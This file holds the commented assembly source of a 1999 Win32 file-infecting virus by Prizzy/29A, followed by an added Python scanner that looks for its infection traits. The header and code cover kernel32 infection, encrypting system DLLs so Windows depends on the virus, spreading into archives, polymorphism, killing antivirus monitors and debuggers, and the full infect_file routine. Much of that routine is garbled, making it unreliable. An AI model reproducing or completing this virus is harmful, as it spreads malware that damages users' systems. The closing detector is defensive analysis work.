;
; I'm very proud on my very first virus at Win32 platform. It infects EXE
; files with PE (Portable Executable) header. Also it can compress itself
; into ZIP/ARJ/RAR/ACE/CAB archivez. If the virus catches DLL operations, it
; encrypts/decrypts them by cryptography functions. Thus, we can pronounce
; the system is dependent on the virus (OneHalf idea).
;
; When an infected EXE is started, it infects KERNEL32.DLL, hooks some Win32
; functions and on the next reboot it is activated. It catches "all" file
; operations, creates threads/mutexes, runs Hyper Infection for API to find
; archivez, AV checksum files, EXEs and so on.
;
; If PHI-API (Prizzy Hyper Infection for API) finds an archive, the virus
; compresses itself and adds itself to the archive body (inside, not at the
; end). My PPE-II does not support copro & MMX garbages any more, only the
; base garbages, but many features are new.
;
;
; Detailed information
;
;
; Cryptography area, based on WinAPI (SR2/NT) functions
;
; Let us start. I exploited OneHalf technics for the Win32 world, a new
; method in our vx world. You exactly know OneHalf tries to encode your
; sectors, and if you want to read them it decodes the ones you read, and so
; on; you exactly know what I think. Well, because I use kernel32 infection
; I can hook all file functions. Then I encode all DLL files by PHI-II (Hyper
; Infection), and if the system wants to open a DLL file I decode that one,
; and so on... The Win32 system is dependent on my virus. Naturally, the user
; can re-install Win95/98/NT/2000, but then there are still DLLs in MS Office,
; Visual C, ICQ, Outlook, AutoCAD and many many more appz. For comparison:
; my Win98 has 831 DLL files and on all my disks there are 5103 DLL files
; (including Win2k). I know this is the perfect way to get all what you want.
; But I've found out I can't hook all Win32 file operations, so the true
; crypto DLL will be inside the ring0/ring3 world - my future work...
;
;
; Prizzy Polymorphic Engine (PPE-II, new version)
;
; I've removed all copro & MMX garbages and I've coded this new stuff:
;  * brute-attack algorithm
;  * random multi-layer engine
; By "brute-attack" I'm finding the right code value by checksum. And because
; I don't know the number, AV doesn't know it either. This process takes
; mostly 0.82 seconds on my P233. For more info find "PPE_Brute_init:" in
; this source.
;
; In the second case I don't decode by default (up to down) but by a random
; multi-layer algorithm. It means I generate a certificate buffer and by it
; I decode up or down. Thus I can generate more than 950 layers, typically
; some 69 layers. Also the random buffer behind the poly loop has
; anti-heuristic protection (gaps) so that AV couldn't simulate that process.
; Find the "PPE_MLAYER_GENERATE:" label for more information.
;
;
; Infection of ZIP archivez, including RAR/ACE EXE-SFX
;
; ...fected file by random compression level. The dropper is stored in-
; side the archive, not at the end, so I don't need it...
; However these operations are very complex, especially ZIP infection, but
; it isn't impossible. So AV cannot check only the last (stored) file in the
; archive, but must look inside it.
;
;
; Main features
;
;  * Platforms:      Windows 95/98, Windows NT/2000 (tested on 2031 build)
;  * Residency:      Yes, kernel32 way, working on 95/98 and NT/2K systems
;  * Non-residency:  Yes, only K32 infection
;  * Stealth:        Yes, DLLs working: opening, copying and loading
;  * Antidebugging:  Yes, some stupid debuggers like TD32; routines for
;                    disabling SoftICE 95/NT
;  * Antiheuristic:  Yes, threads way and multi-layer anti-heuristic
;  * Antiantivirus:  Yes, deleting checksum files, hacking Avast database
;  * Other anti-*:   Yes, anti-emulator, anti-bait, anti-monitor
;  * Fast infection: Yes/No, infects only 20 EXEs every reboot, but infects
;                    all types of archivez on all diskz
;  * Polymorphism:   Yes, using base garbages from Win9x.Prizzy, including
;                    brute-force way and random multi-layer way
;  * Other features: (a) use of brute-CRC64 algorithm to find APIs in K32
;                    (b) encoding and decoding DLLs in real time
;                    (c) memory allocations by "CreateFileMapping" func.
;                        because of sharing among processes
;                    (d) use of threads, mutexes & process tricks
;                    (e) support of "do not infect" table
;                    (f) checking files by natural logarithm
;                    (g) no optimalization, yeah, I don't lie (read
;                        "Words from Prizzy" in 29A #4 to know why)
;                    (h) Unicode support
;
;
; Greetings
;
; And finally my greetz go to:
;
;  Darkman       U're really great inet pal, thanx for fun on #virus :)
;  Benny         Thanx for big help with threads, mutexes... We're wait-
;                ing for Darkman's trip here, aren't we :)?
;  GriYo         Nah, I'd like to understand your ideas... Thanx :)!
;  Flush         U've really big anti-* ideas, dude
;  MemoryLapse   Yeah, K32 infection... Go out of EFnet to Undernet
;  LordJulus     You have great vx articles, viruses...
;  Asmodeus      Finish that virus and release it; thanx for your trust
;  AV companies  Just where is my Win9x.Prizzy description :)?
;  ... and for VirusBuster and Bumblebee
;
;
; Contact me
;
; PRIZZY@coderz.net
; http://prizzy.cjb.net
;
;
; (c)oded by Prizzy/29A, December 1999
;
;
.386P
.MODEL FLAT, STDCALL
INCLUDE INCLUDE\WIN32API.INC
INCLUDE INCLUDE\USEFUL.INC
INCLUDE INCLUDE\MZ.INC
INCLUDE INCLUDE\PE.INC
EXTRN ExitProcess:PROC
EXTRN MessageBoxA:PROC
; -------------------------------------------------------------
; Program start
; -------------------------------------------------------------
.DATA
        DB      ?
.CODE
; -------------------------------------------------------------
; Some equates needed by virus
; -------------------------------------------------------------
DEBUG           EQU YEZ                         ; only for debug and 1st start
MEM_SIZE        EQU (MEM_END-VIRUS_START)       ; size of virus in memory
FILE_SIZE       EQU (FILE_END-VIRUS_START)      ; size of virus in file
INFECT_MINSIZE  EQU 4096                        ; only filez bigger than 4K
INFECT_MAXSIZE  EQU 100*1024*1024               ; up to 100MB
ACCESS_EBX      EQU (DWORD PTR 16)              ; access into stack when
ACCESS_EDX      EQU (DWORD PTR 20)              ; PUSHAD will be used
ACCESS_ECX      EQU (DWORD PTR 24)
ACCESS_EAX      EQU (DWORD PTR 28)
SEARCH_MEM_SIZE EQU 100*(SIZE DTA+SIZE SEARCH_ADDRESS)
; -------------------------------------------------------------
; Some structurez for virus
; -------------------------------------------------------------
DTA_STRUC       STRUC                   ; WIN32_FIND_DATA structure
  DTA_FILEATTR          DD ?            ; for FindFirstFile function
  DTA_TIME_CREATION     DQ ?
  DTA_TIME_LASTACCESS   DQ ?
  DTA_TIME_LASTWRITE    DQ ?
  DTA_FILESIZE_HI       DD ?
  DTA_FILESIZE          DD ?
  DTA_RESERVED_0        DD ?
  DTA_RESERVED_1        DD ?
  DTA_FILENAME          DB 260 DUP (?)
  DTA_FILENAME_SHORT    DB 14 DUP (?)
ENDS
;
SYSTIME_STRUC   STRUC                   ; used by my Windows API
  WYEAR                 DW 0000H        ; "Hyper Infection"
  WMONTH                DW 0000H
  WDAYOFWEEK            DW 0000H
  WDAY                  DW 0000H
  WHOUR                 DW 0000H
  WMINUTE               DW 0000H
  WSECOND               DW 0000H
  WMILLISECONDS         DW 0000H
ENDS
;
PROCESS_INFORMATION STRUC               ; CreateProcess: struc #1
  HPROCESS              DD 00000000H
  HTHREAD               DD 00000000H
  DWPROCESSID           DD 00000000H
  DWTHREADID            DD 00000000H
ENDS
;
STARTUP_INFO    STRUC                   ; CreateProcess: struc #2
  CB                    DD 00000000H
  LPRESERVED            DD 00000000H    ; this struc has been stolen
  LPDESKTOP             DD 00000000H    ; from "Win32 Help"
  LPTITLE               DD 00000000H
  DWX                   DD 00000000H
  DWY                   DD 00000000H
  DWXSIZE               DD 00000000H
  DWYSIZE               DD 00000000H
  DWXCOUNTCHARS         DD 00000000H
  DWYCOUNTCHARS         DD 00000000H
  DWFILLATTRIBUTE       DD 00000000H
  DWFLAGS               DD 00000000H
  WSHOWWINDOW           DW 0000H
  CBRESERVED2           DW 0000H
  LPRESERVED2           DD 00000000H
  HSTDINPUT             DD 00000000H
  HSTDOUTPUT            DD 00000000H
  HSTDERROR             DD 00000000H
ENDS
;
FILE_TIME       STRUC                   ; Get/SetFileTime struc
  DWLOWDATETIME         DD 00000000H
  DWHIGHDATETIME        DD 00000000H
ENDS
; -------------------------------------------------------------
; Some macroz needed by virus
; -------------------------------------------------------------
; Search "Anti-Emulators:" for more information
@ANTI_E_START   MACRO START_HACK, FINISH_HACK
                WHILE (NUM NE 0)
                PUSH DWORD PTR [EBP + START_HACK + \
                        ((FINISH_HACK-START_HACK)/4+1-NUM)*4]
                NUM = NUM - 1
                ENDM
                NUM = (FINISH_HACK-START_HACK)/4+1
ENDM
;
@ANTI_E_FINISH  MACRO START_HACK, FINISH_HACK, THREAD_HANDLE
                WHILE (NUM NE 0)
                POP DWORD PTR [EBP + FINISH_HACK - \
                        (FINISH_HACK-START_HACK) MOD 4 - \
                        ((FINISH_HACK-START_HACK)/4+1-NUM)*4]
                NUM = NUM - 1
                ENDM
                CALL [EBP+DDCLOSEHANDLE], THREAD_HANDLE
                NUM = (FINISH_HACK-START_HACK)/4+1
ENDM
; -------------------------------------------------------------
; Virus code starts here
; -------------------------------------------------------------
VIRUS_START:
        CALL    GET_BASE_EBP            ; get actual address to EBP
        MOV     EAX,EBP
        DB      2DH                     ; SUB EAX,INFECTED_EP
INFECTED_EP     DD 00001000H
        DB      05H                     ; ADD EAX,ORIGINAL_EP
ORIGINAL_EP     DD 00000000H
        SUB     EAX,[EBP+__PLLG_LSIZE]
        PUSH    EAX                     ; host address
; Use anti-emulator
        PUSHA
        @SEH_SETUPFRAME
        CALL    $                       ; ehm :)
        JMP     __RETURN
__ANTI_E_1:
        @SEH_REMOVEFRAME                ; reset SEH handler
        POPA
        CALL    FIND_KERNEL32           ; find kernel's base address
; Use anti-emulator
        @ANTI_E_START __THREAD_1_BEGIN, __THREAD_1_FINISH
        LEA     EAX,[EBP+__THREAD_1]    ; thread function
        MOV     EBX,OFFSET __THREAD_1_BEGIN + \
                (__THREAD_1_FINISH-__THREAD_1_BEGIN) \
                SHL 18H                 ; upper imm8 register in EBX
        CALL    __MYCREATETHREAD        ; * anti-heuristic
__THREAD_1_BEGIN EQU THIS BYTE
        JMP     $                       ; anti-emulator :)
        JMP     __RETURN                ; PATCH THIS! random number
__THREAD_1_FINISH EQU THIS BYTE
        @ANTI_E_FINISH __THREAD_1_BEGIN, __THREAD_1_FINISH, EAX
; Next code...
        CALL    KILL_AV_MONITORS        ; kill AVP, Avast32 etc.
        CALL    KILL_DEBUGGERS          ; bye, bye SoftICE, my honey
        CALL    CREATE_MUTEX            ; already resident?
        JC      __RETURN                ; go back, if yes
        CALL    CRYPTO_STARTUP
        CALL    INFECT_KERNEL           ; ehm, find kernel and infect!
__RETURN:
        POP     EAX
        ADD     EAX,OFFSET VIRUS_START
        JMP     EAX                     ; go back, my lord...
; -------------------------------------------------------------
; Main function to infect file
; -------------------------------------------------------------
; This is the main function which infects a file.
;
; Extension support:
;   EXE ... executable file (PE), RAR/ACE SFX file
;   DLL ... kernel32 infection, encrypting through PHI-API
;   CAB ... infecting Microsoft Cabinet file
;   ZIP/ARJ/RAR/ACE ... dropper compressed, inside archive
;
; Okay, here is the truth. I had many problems with EXE and DLL
; infection in this function. I found out all valuez have to
; be aligned etc., especially Win2k needed that. I also use the
; "CheckSumMappedFile" function to calculate the app's checksum.
;
Infect_file:
; Save Registers & Get Delta
Pusha
CALL GET_BASE_EBP
Get Extension
MOV EDI, [EBP FileName_ptr]
Convert LowerCase Characters to Uppercase
Push EDI
Call [EBP DDLSTRLEN]; Get Length of FileName
Inc Eax; Number of Characters To
Push Eax; Progress
Push EDI; FileName
Call [EBP DDCHARUPPERBUFFA]; Convert to Uppercase
; Infect Only Files in There Dirz
IFDEF Debug
CMP [EDI 00000000H], 'W /: C'; "C: / Win / WEWB4 / XX /"
JNZ __IF_DEBUG; Directory
CMP [EDI 00000004H], 'W / Ni'
JNZ __IF_DEBUG
CMP [EDI 00000008H], '4bwe'
JNZ __IF_DEBUG
CMP [EDI 0000000Ch], '/ xx /'
JZ __IF_DEBUG2
__IF_DEBUG:
CMP [EDI], 'W /: C'; "c: / windows / kern"
JNZ Infect_file_exit
CMP [EDI 4], 'Odni'
JNZ Infect_file_exit
CMP [EDI 8], 'K / SW'
JNZ Infect_file_exit
CMP [EDI 8 4], 'Enre'
JNZ Infect_file_exit
__IF_DEBUG2:
ENDIF
Check File Name (by avoid table)
MOV EBX, [EBP FileName_ptr]; FileName
Lea ESI, [EBP AVOID_TABLE]; Avoid Table
Call validate_name
JC infect_file_exit
Check av files (Anti-Bait)
Call fuck_av_files
JC infect_file_exit
Get Extension
CLD
MOV Al, '.'; search this char
MOV CX, FileName_Size; Max filename_size
Repunz scaSB; searching ...
Dec Edi; Set to That Char
CMP Al, [EDI]; Check Again!
JNZ infect_file_exit; shit, bad last char
IFDEF Debug
MOV EAX, [EDI-4]; You Can Infect ONLY
CMP EAX, '23LE'
JZ __ONLYMYKERNEL
CMP EAX, 'DCBA'; this file on my disk
JNZ infect_file_exit; I won't risk
__ONLYMYKERNEL:
ENDIF
Get File Information
Lea ESI, [EBP DTA]; DTA Structure
MOV EDX, [EBP FileName_ptr]; FileName Pointer
Call __myfindfirst
JC infect_file_exit; service?
Call __myfindclose; Close Handle
CMP DWORD PTR [EBP IT_IS_KERNEL], 00000001H
JZ infect_file_continue; if kernel32, infect it
Check Extension
MOV EX, [EDI]; Get Ext Of File
NOT EAX
CMP EAX, NOT 'EXE.'; Is IT EXE FILE?
JNZ next_ext_1
Call infect_ace_rar; is IT ACE / RAR EXE-SFX File?
JNC Infect_file_exit
JMP next_ext_end
NEXT_EXT_1:
CMP EAX, NOT 'ECA.'; Is IT ACHIVE FILE?
JNZ next_ext_2
Call infect_ace
NEXT_EXT_2:
CMP EAX, NOT 'RAR.'; Is IT RAR Archive File?
JNZ next_ext_3
Call infect_rar
NEXT_EXT_3:
CMP EAX, NOT 'JRA.'; Is IT ARJ Archive File?
JNZ next_ext_4
Call infect_arj
NEXT_EXT_4:
CMP EAX, NOT 'PIZ.'; Is IT ZIP Archive File?
JNZ next_ext_5
Call infect_zip
NEXT_EXT_5:
CMP EAX, NOT 'BAC.'; Is IT Cab Archive File?
JNZ Infect_file_exit
Call infect_cab
JMP infect_file_exit
NEXT_EXT_END:; Infect IF ANY EXE FILE
Check Number of Infected Files
CMP [EBP NEWACE.DROPPER], 00000000H
JZ Infect_File_Continue; Dropper EXISTS?
CMP DWORD PTR [EBP File_INFECTED], 20
JAE INFECT_FILE_EXIT; Infected More Ten EXES?
Check File Size
INFECT_FILE_CONTINUE:
MOV EAX, [EBP DTA.DTA_FILESIZE]
CMP EAX, INFECT_MINSIZE; IS FileSize Smaller?
JB infect_file_exit
CMP EAX, INFECT_MAXSIZE; Is FileSize Bigger?
Ja infect_file_exit
Set file attributes
MOV ECX, File_Attribute_normal
MOV EDX, [EBP FileName_ptr]
Call __mysetttrfile
JC infect_file_exit; service?
; Open file
MOV EDX, [EBP+FileName_ptr]
Call __myopenfile; open file!
JC Infect_file_Restattr
MOV [EBP FILE_HANDLE], EAX
CREATE A MEMORY MAP OBJECT
Push 00000000H; Name of File Mapping Object
Push 00000000H; Low 32 Bits of Object Size
Push 00000000H; High 32 Bits of Object Size
Push Page_readonly; Get Needed Valuez, ETC.
Push 00000000H; Optional Security Attributes
Push [EBP FILE_HANDLE]; Handle to File To Map
Call [EBP DDCREATEFILEMAPPINGA]
OR EAX, EAX; FAILED?
JZ infect_file_close
MOV [EBP File_HMAP], EAX; Store Mapped File Handle
View of File IN Our Address
Push 00000000H; Number of Bytes To Map
Push 00000000H; Low 32 bits of the offset
Push 00000000H; High 32 Bits of the Offset
Push file_map_read; Access Mode
Push [EBP File_HMAP]; mapped file handle
Call [EBP DDMAPVIEWOFFILE]
OR EAX, EAX; FAILED?
JZ infect_file_closemap
MOV [EBP File_HMEM], EAX; Mapped File In Memory
Check File Signature
CMP Word PTR [Eax.mz_magic], /
Image_dos_signature; test 'mz'
JNZ Infect_File_Unmap
Check "PE" Valuez
CMP Word PTR [Eax.mz_Crlc], 0000H
JZ infect_file_okay; no pe?
CMP Word PTR [Eax.mz_Lfarlc], 0040H
JB infect_file_unmap; bad pe?
Infect_file_okay:
Seek on NT Header
Mov ESI, EAX
Add esi, [eax.mz_lfanew]
PUSH ESI
Call [EBP DDISBADCODEPTR]; Can We Read Memory At Least?
OR EAX, EAX
JNZ Infect_File_Unmap
Check "PE" SIGNATURE
CMP DWORD PTR [ESI.NT_SIGNATURE], /
Image_nt_signature
JNZ Infect_file_unmap; Is IT Really 'PE / 0/0'?
? Already Infected?
MOV EAX, [EBP File_HMEM]; mapped file in memory
Add Eax, [EBP DTA.DTA_FILESIZE]
MOV EAX, [EAX-00000004h]; Infected DWORD FLAG
Call __check_infected
JNC Infect_File_Unmap
Check Header Flags
MOV AX, [ESI NT_FILEHEADER.FH_CHARACTERISTICS]]
Test AX, Image_File_Executable_Image
JZ Infect_File_Unmap
TEST AX, Image_FILE_DLL; NO DLL?
JZ infect_file_no_dll
CMP DWORD PTR [EBP IT_IS_KERNEL], 00000000H
JZ infect_file_unmap; Is IT Kernel32 Infection?
INFECT_FILE_NO_DLL:
Call __getlastObjectTable; Seek On Last Object Table
; Alloc Memory for Polymorphic ENGINE
Mov Eax, File_Size 30000h
Call malloc
MOV [EBP MEM_ADDRESS], EAX
Add Eax, File_Size
MOV [EBP POLY_START], EAX
Get New Entry-Point (EXE), or CHANGE IT OF KERNEL32?
MOV EAX, [EBX Sh_SIZEOFRAWDATA]
Add Eax, [EBX SH_VIRTUALADDRESS]
MOV DWORD PTR [EBP Infected_ep], EAX
MOV EAX, [ESI NT_OPTIONALHEADER.OH_ADDRESSOFENTRYPOINT]
MOV DWORD PTR [EBP Original_EP], EAX
MOV [EBP POLY_FINISH], MEM_SIZE
Run PRIZZY POLYMORPHIC ENGINE (PPE-II)
CMP DWORD PTR [EBP IT_IS_KERNEL], 00000000H
Jnz infect_file_common
Call PPE_STARTUP
Calculate Maximum Infected File Size
Infect_file_common:
MOV EAX, [EBX Sh_SIZEOFRAWDATA]; File Size
Add Eax, [EBX SH_POINTERTORAWDATA]
Add Eax, [EBP POLY_FINISH]; Virus File Size
Add Eax, 00000004h; Infected Flag
MOV ECX, [ESI NT_OPTIONALHEADER.OH_FILALIGNMENT]
XOR EDX, EDX
Add Eax, ECX
Dec EAX
Div ECX
Mul ECX
Push EAX
Unmap file object
Push [EBP File_HMEM]
Call [EBP DDUNMAPVIEWOFFILE]
; Close Mapping File Object
Push [EBP File_HMAP]
Call [EBP DDCLOSEHANDLE]
; Reopen Memory Mapped File Object
Push 00000000H; Name of File Mapping Object
Push DWORD PTR [ESP 0000004h]; LOW 32 BITS OF Object Size
Push 00000000H; High 32 Bits of Object Size
Push Page_readwrite; Get Needed Valuez, ETC.
Push 00000000H; Optional Security Attributes
Push [EBP+FILE_HANDLE]; Handle to File To Map
Call [EBP DDCREATEFILEMAPPINGA]
MOV [EBP File_HMAP], EAX; Store Mapped File Handle
View of File IN Our Memory
Push 00000000H; Number of Bytes To Map
Push 00000000H; Low 32 bits of the offset
Push 00000000H; High 32 Bits of the Offset
Push file_map_write; Access Mode
Push [EBP File_HMAP]; mapped file handle
Call [EBP DDMAPVIEWOFFILE]
MOV [EBP File_HMEM], EAX; Mapped File In Memory
Seek on Last Object Table
Add eax, [eax.mz_lfanew]
Mov ESI, EAX
Call __getlastObjectTable
Infect "kernel32" File or change Entrypoint
CMP DWORD PTR [EBP IT_IS_KERNEL], 00000000H
JZ Infect_File_ENTRY
MOV [EBP __ PLLG_LSIZE], 00000000H; More Info In That Func
Call infect_file_kernel; hook "kernel32" Table :)
JMP infect_file_no_change
INFECT_FILE_ENTRY:
MOV EAX, DWORD PTR [EBP Infected_ep]
Add Eax, [EBP File_Size3]
MOV [ESI NT_OPTIONALHEADER.OH_ADDRESSOFENTRYPOINT], EAX
Copy MEM_ADDRESS (Virus Body) To the end of file
INFECT_FILE_NO_CHANGE:
PUSH ESI
MOV ESI, [EBP MEM_ADDRESS]; Source Data
Mov EDI, [EBX Sh_SIZEOFRAWDATA]
Add Edi, [EBX SH_POINTERTORAWDATA]
Add Edi, [EBP File_HMEM]; Destination Pointer
MOV ECX, [EBP POLY_FINISH]; Number of Bytes To Copy
REP MOVSB
POP ESI
Calculate New Physical Size
MOV EAX, [EBP POLY_FINISH]
CMP DWORD PTR [EBP IT_IS_KERNEL], 00000000H
JZ $ 7; this isn't Logic But I Had
MOV Eax, Mem_Size; Problems In K32 Memory
Add Eax, [EBX Sh_SIZEOFRAWDATA]
MOV ECX, [ESI NT_OPTIONALHEADER.OH_FILALIGNMENT]
XOR EDX, EDX
Add Eax, ECX
Dec EAX
Div ECX
Mul ECX
MOV [EBX Sh_SIZEOFRAWDATA], EAX
; Calculate new potential virtual size
MOV EAX, [EBX+SH_VIRTUALSIZE]
Add Eax, MEM_SIZE
MOV ECX, [ESI NT_OPTIONALHEADER.OH_SECTIONALIGNMENT]
XOR EDX, EDX
Add Eax, ECX
Dec EAX
Div ECX
Mul ECX
; if new phys_size> virt_size ==> virt_size = phys_size
CMP EAX, [EBX Sh_SIZEOFRAWDATA]
JNC infect_file_no_update
MOV EAX, [EBX Sh_SIZEOFRAWDATA]
INFECT_FILE_NO_UPDATE:
MOV [EBX SH_VIRTUALSIZE], EAX
Add Eax, [EBX SH_VIRTUALADDRESS]
Infected Host IncreaSed An Image Size?
CMP Eax, [ESI NT_OPTIONALHEADER.OH_SIZEOFIMAGE]
JC infect_no_update_2
MOV [ESI NT_OPTIONALHEADER.OH_SIZEOFIMAGE], EAX
INFECT_NO_UPDATE_2:
Set these PE FLAGS
OR DWORD PTR [EBX Sh_Characteristics], /
Image_scn_cnt_code or image_scn_mem_execute or /
Image_scn_mem_write
Already Infected Flag
Mov Eax, 02302301H; Special Number
Call PPE_GET_RND_RANGE
INC EAX; IT CAN't Be Zero
Imul Eax, 117; Encrypt One
POP EDI; File Size Virus Size
MOV [EBP FILE_HSIZE], EDI
Add Edi, [EBP File_HMEM]; Mapped File In Memory
MOV [EDI-00000004H], EAX; Already Infected Flag
; Calculate New Checksum Because of Win2k and Winnt :)
CMP DWORD PTR [ESI NT_OPTIONALHEADER. /
Oh_Checksum], 00000000H
JZ infect_file_no_checksum
@pushsz "imagehlp.dll"; load "imagehlp.dll" Library
Call [EBP DDLOADLIBRARYA]
OR EAX, EAX; FAILED?
JZ infect_file_no_checksum
Push Eax; Parameter for Freelibrary
Get Function To Calculate Checksum
@Pushsz "ChecksummappedFile"; Get Address of this function
Push Eax; Library Handle
Call [EBP DDGETPROCADDRESS]
OR EAX, EAX
JZ infect_file_deload
Calculate Checksum
Lea ECX, [ESI NT_OPTIONALHEADER.OH_CHECKSUM]
PUSH ECX; receives computed checksum
CALL $+9; header old checksum
DD ?
Push DWORD PTR [EBP FILE_HSIZE]
Push [EBP File_hmem]; Memory Mapped Address
Call EAX
INFECT_FILE_DELOAD:
Call [EBP DDFREELIBRARY]
; DEAALLOC MEMORY for PPE-II
INFECT_FILE_NO_CHECKSUM:
MOV EAX, [EBP MEM_ADDRESS]
Call Mdealloc
New infected file
INC DWORD PTR [EBP File_INFECTED]
Use of use for acrhive dropper?
CMP DWORD PTR [EBP DTA.DTA_FILESIZE], 30000
Ja infect_file_unmap; for archive fsize <30kb
Push [EBP File_hmem]; Mapped File in Memory
Call [EBP DDUNMAPVIEWOFFILE]
Push [EBP File_HMAP]; mapped file object
Call [EBP DDCLOSEHANDLE]
MOV EBX, [EBP FILE_HANDLE]; I Must Close Infected File
Call __myclosefile; Coz I'll Copy IT, ETCETERA
Call __add_dropper; Compress IT by Zip, Rar ...
JMP Infect_File_Restattr
INFECT_FILE_UNMAP:
Push [EBP File_hmem]; Mapped File in Memory
Call [EBP DDUNMAPVIEWOFFILE]
Infect_file_closemap:
Push [EBP File_HMAP]; mapped file object
Call [EBP DDCLOSEHANDLE]
INFECT_FILE_TIME:
Lea EAX, [EBP DTA.DTA_TIME_LASTWRITE]
Lea ECX, [EBP DTA.DTA_TIME_LASTACCESS]
Lea Edx, [EBP DTA.DTA_TIME_CREATION]
Call [EBP DDSETFILETIME], /
[EBP FILE_HANDLE], /
EDX, ECX, EAX
Infect_file_close:
MOV EBX, [EBP File_Handle]; Close File Handle
Call __myclosefile
INFECT_FILE_RESTATTR:
MOV ECX, [EBP DTA.DTA_FILEATTR]
MOV EDX, [EBP FileName_ptr]; Restore File Attributes
Call __mysetttrfile
INFECT_FILE_EXIT:
POPA; Go to Hyperinfection Or To
Ret; kernel32 hooked functions
; -------------------------------------------------------------
; Common file infection semi-functions.
;
__getlastObjectTable:
MOVZX EAX, [ESI+NT_FILEHEADER.FH_NUMBEROFSECTIONS]
CDQ
MOV ECX, Image_SizeOf_SECTION_HEADER
Dec EAX
Mul ECX; EAX = OFFS of Last Section
Movzx EDX, [ESI NT_FILEHEADER.FH_SIZEOFOPTIONALHEADER]
Add Eax, EDX
Add Eax, ESI
Add Eax, Offset NT_OptionalHeader.oh_magic; Seek to L.O. Table
XCHG EAX, EBX
RET
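; The layout infect_file leaves behind (entry point moved to the end of the last
; section, that section flagged CODE|EXECUTE|WRITE, a random multiple of 117 stored
; in the file's last DWORD as the "already infected" flag) can be checked for from
; the defender's side. The Python scanner below is an added example, not part of
; Prizzy's source: it parses PE32 headers with the struct module and scans two
; sample images that are constructed in memory (headers only, zero-filled bodies).
; The multiple-of-117 rule is an assumption drawn from the IMUL EAX,117 above,
; since the matching __check_infected routine is not on this page.

```python
import struct

# Section characteristics from winnt.h
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
WX_CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
# infect_file computes the end-of-file marker as (rnd+1)*117. The matching
# __check_infected routine is not on this page, so "multiple of 117" is an
# assumption drawn from that IMUL, not a rule taken from the virus itself.
MARKER_MULTIPLIER = 117


def parse_pe(data):
    """Parse a PE32 image: return (entry_rva, [section dicts]) or raise ValueError."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]       # FileHeader.NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]  # FileHeader.SizeOfOptionalHeader
    opt = e_lfanew + 24                                         # start of optional header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]     # AddressOfEntryPoint
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i                           # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0"), "vsize": vsize, "vaddr": vaddr,
                         "rawsize": rawsize, "rawptr": rawptr, "chars": chars})
    if not sections:
        raise ValueError("no sections")
    return entry_rva, sections


def scan(data):
    """Return the list of infect_file-style indicators present in a PE image.

    Each indicator alone is weak (packers also put the EP into a W+X last
    section; one file in 117 ends in a multiple of 117 by chance), so act on
    the conjunction of hits rather than on any single one.
    """
    entry_rva, sections = parse_pe(data)
    last = sections[-1]
    hits = []
    # (1) infect_file sets EP = last.VirtualAddress + last.SizeOfRawData (old value),
    #     so the entry point lands inside the last section of the file.
    ep_sec = next((s for s in sections
                   if s["vaddr"] <= entry_rva < s["vaddr"] + max(s["vsize"], s["rawsize"])), None)
    if ep_sec is last and len(sections) > 1:
        hits.append("entry point inside last section")
    # (2) it ORs IMAGE_SCN_CNT_CODE|MEM_EXECUTE|MEM_WRITE into that section's flags.
    if last["chars"] & WX_CODE == WX_CODE:
        hits.append("last section is CODE|EXECUTE|WRITE")
    # (3) the "already infected" DWORD is written at the very end of the file.
    marker = struct.unpack_from("<I", data, len(data) - 4)[0]
    if marker and marker % MARKER_MULTIPLIER == 0:
        hits.append("trailing DWORD is a non-zero multiple of 117")
    return hits


def build_pe(sections_spec, entry_rva, trailer=b""):
    """Build a headers-only PE32 image (constructed sample; section bodies are zero-filled)."""
    e_lfanew, opt_size = 0x40, 0xE0
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections_spec), 0, 0, 0, opt_size, 0x0102)
    opt_hdr = struct.pack("<HBBIIII", 0x10B, 6, 0, 0, 0, 0, entry_rva).ljust(opt_size, b"\0")
    sec_hdrs, body, raw_ptr = b"", b"", 0x200
    for name, vaddr, size, chars in sections_spec:
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, size, vaddr, size, raw_ptr, 0, 0, 0, 0, chars)
        body += b"\0" * size
        raw_ptr += size
    return (dos + b"PE\0\0" + file_hdr + opt_hdr + sec_hdrs).ljust(0x200, b"\0") + body + trailer


def clean_sample():
    """Constructed: EP in .text, last section is plain data, no trailing marker."""
    return build_pe([(b".text", 0x1000, 0x200, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
                     (b".data", 0x2000, 0x200, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)],
                    entry_rva=0x1010)


def suspect_sample():
    """Constructed: the layout infect_file leaves behind. Last section grown by 0x100 bytes,
    EP moved to its old end (0x2000+0x200), flags forced to W+X code, (rnd+1)*117 at EOF."""
    return build_pe([(b".text", 0x1000, 0x200, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
                     (b".data", 0x2000, 0x300, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | WX_CODE)],
                    entry_rva=0x2200, trailer=struct.pack("<I", (4321 + 1) * 117))


if __name__ == "__main__":
    for label, image in (("clean", clean_sample()), ("suspect", suspect_sample())):
        print(label, scan(image) or ["no indicators"])
```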
; -------------------------------------------------------------
